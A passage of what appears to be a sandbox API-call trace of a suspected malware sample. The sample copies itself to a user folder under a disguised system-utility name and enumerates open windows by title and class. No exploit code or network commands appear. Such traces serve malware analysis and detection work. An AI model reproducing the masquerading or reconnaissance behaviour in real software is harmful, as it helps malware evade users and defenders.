hHeap=0x12c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0203.793] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0203.793] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff690 [0203.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66c8 [0203.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0203.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66c8 | out: hHeap=0x12c0000) returned 1 [0203.793] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff690 | out: hHeap=0x12c0000) returned 1 [0203.793] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.793] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff690 [0203.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0203.793] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6590 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6590 | out: hHeap=0x12c0000) returned 1 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff690 | out: hHeap=0x12c0000) returned 1 [0203.794] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0203.794] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0203.794] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0203.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.794] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0203.794] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0203.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0203.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0203.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0203.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e2c0 [0203.795] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff690 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67a0 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efac0 [0203.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67a0 | out: hHeap=0x12c0000) returned 1 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffb90 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6698 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65d8 [0203.795] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0203.795] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b65d8 | out: hHeap=0x12c0000) returned 1 [0203.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffaf0 [0203.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6668 [0203.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20a) returned 0x1302b30 [0203.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa30 [0203.796] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7cf398, nSize=0x7fff | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe")) returned 0x62 [0203.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd0) returned 0x132fd68 [0203.796] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efda0 [0203.796] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", nBufferLength=0x7fff, lpBuffer=0x7bf388, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", lpFilePart=0x0) returned 0x62 [0203.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132fd68 | out: hHeap=0x12c0000) returned 1 [0203.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0203.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6680 [0203.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67a0 [0203.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa20 [0203.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67b8 [0203.797] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa20 | out: hHeap=0x12c0000) returned 1 [0203.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0203.797] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10000) returned 0x14bffb0 [0203.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66b0 [0203.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa20 [0203.799] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0203.799] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.799] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x7df778 | out: lpNewFilePointer=0x0) returned 1 [0203.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffbe0 [0203.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0203.799] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd20 [0203.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0203.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6680 | out: hHeap=0x12c0000) returned 1 [0203.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6668 | out: hHeap=0x12c0000) returned 1 [0203.799] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67b8 | out: hHeap=0x12c0000) returned 1 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67a0 | out: hHeap=0x12c0000) returned 1 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffaf0 | out: hHeap=0x12c0000) returned 1 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0203.800] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.800] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffaf0 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66c8 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6608 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa30 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66c8 | out: hHeap=0x12c0000) returned 1 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffaf0 | out: hHeap=0x12c0000) returned 1 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6608 | out: hHeap=0x12c0000) returned 1 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.800] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0203.800] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffaf0 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0203.800] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0203.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0203.801] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffca8 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa30 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66c8 [0203.801] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.801] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa30 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0203.801] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffaf0 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66c8 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa30 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffca8 [0203.801] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0203.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe50 [0203.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6758 [0203.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6590 [0203.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe50 [0203.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65d8 [0203.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0203.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10000) returned 0x14cffb8 [0203.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6770 [0203.802] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efda0 [0203.802] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\btpanui\\systempropertiesperformance.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0203.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffcd0 [0203.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6608 [0203.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe90 [0203.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe00 [0203.803] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffca8 [0203.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0203.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0203.803] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b65d8 [0203.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6620 [0203.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa40 [0203.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67a0 [0203.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd10 [0203.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6590 [0203.804] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe20 [0203.804] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 1 [0203.804] GetWindowTextW (in: hWnd=0x10128, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.804] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0203.804] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.805] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0203.805] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.805] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.805] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.805] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.805] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.805] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.805] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.806] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.806] GetWindowTextW (in: hWnd=0x100be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.806] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.806] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.806] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.806] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.806] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.806] GetWindowTextW (in: hWnd=0x10098, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.806] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.806] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.807] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.807] GetWindowTextW (in: hWnd=0x10080, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.807] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0203.807] GetWindowTextW (in: hWnd=0x20048, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0203.807] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0203.807] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.807] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0203.807] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.807] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0203.808] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0203.808] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7df1a8) returned 0x9 [0203.808] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0203.808] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.808] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0203.808] GetWindowTextW (in: hWnd=0x20286, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0203.808] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0203.808] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.808] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0203.808] GetWindowTextW (in: hWnd=0x20364, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0203.809] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0203.809] GetWindowTextW (in: hWnd=0x10336, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0203.809] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0203.809] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0203.809] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") returned 25 [0203.809] GetWindowTextW (in: hWnd=0x1036a, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Force Which Baby") returned 16 [0203.810] GetClassNameW (in: hWnd=0x1036a, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="force_which_Baby_cls") returned 20 [0203.810] GetWindowTextW (in: hWnd=0x10366, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Drive Law") returned 9 [0203.810] GetClassNameW (in: hWnd=0x10366, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="DriveLawwindow") returned 14 [0203.810] GetWindowTextW (in: hWnd=0x10306, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="3Dftp") returned 5 [0203.810] GetClassNameW (in: hWnd=0x10306, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="3dftp") returned 5 [0203.810] GetWindowTextW (in: hWnd=0x10344, lpString=0x7df1a8, 